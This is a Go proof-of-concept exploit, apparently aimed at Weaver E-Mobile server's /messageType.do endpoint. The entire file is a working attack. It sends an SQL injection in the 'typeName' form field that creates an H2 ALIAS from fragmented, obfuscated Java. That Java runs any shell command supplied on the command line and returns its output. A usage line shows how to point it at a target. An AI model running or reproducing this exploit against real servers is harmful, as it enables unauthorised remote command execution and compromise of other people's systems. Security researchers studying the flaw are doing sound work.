package main
import (
"bytes"
"fmt"
"github.com/hpifu/go-kit/hflag"
"io/ioutil"
"mime/multipart"
"net/http"
"net/url"
"os"
"strings"
)
func main() {
t, c := getParam()
exploit(t, c)
}
func exploit(host, command string) {
p := "1';CREATE ALIAS if not exists MzSNqKsZTagm AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass(\"com.caucho.server.dispatch.ServletInvocation\").getMet','hod(\"getContextRequest\").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField(\"_response\");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod(\"getWriter\");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter(\"\\\\A\");writer.write(scan','ner.hasNext()?sca','nner.next():\"\");}');CALL MzSNqKsZTagm('" + url.QueryEscape(command) + "');--"
c := http.Client{}
buffer := &bytes.Buffer{}
writer := multipart.NewWriter(buffer)
field, _ := writer.CreateFormField("method")
field.Write([]byte("create"))
formField, _ := writer.CreateFormField("typeName")
formField.Write([]byte(p))
_ = writer.Close()
target := strings.Replace(host+"/messageType.do", "//mess", "/mess", 1)
request, _ := http.NewRequest(http.MethodPost, target, strings.NewReader(buffer.String()))
request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36")
request.Header.Set("Accept", "*/*")
request.Header.Set("Connection", "close")
request.Header.Set("Content-Type", writer.FormDataContentType())
request.Header.Set("Content-Length", "1142")
request.Header.Set("Accept-Encoding", "")
do, err := c.Do(request)
if err != nil {
fmt.Println(err)
}
defer func() {
_ = do.Body.Close()
}()
all, err := ioutil.ReadAll(do.Body)
if err != nil {
fmt.Println(err)
}
if string(all) == "{\"status\":false}" {
fmt.Println("无效的命令,也许是服务器不支持或其他情况")
return
}
result := strings.Replace(fmt.Sprintf("%s", all), "{\"status\":false,\"ID\":\"1\",\"msg\":\"推送类型已存在\"}", "", -1)
fmt.Println("\n", result)
}
func getParam() (t, c string) {
hflag.AddFlag("target", "泛微E-MobileServer-地址", hflag.Required(), hflag.Shorthand("t"))
hflag.AddFlag("command", "待执行的系统命令", hflag.Required(), hflag.Shorthand("c"))
if err := hflag.Parse(); err != nil {
fmt.Println(hflag.Usage())
os.Exit(0)
}
return hflag.GetString("target"), hflag.GetString("command")
}go run poc.go -t http://目标 -c 执行命令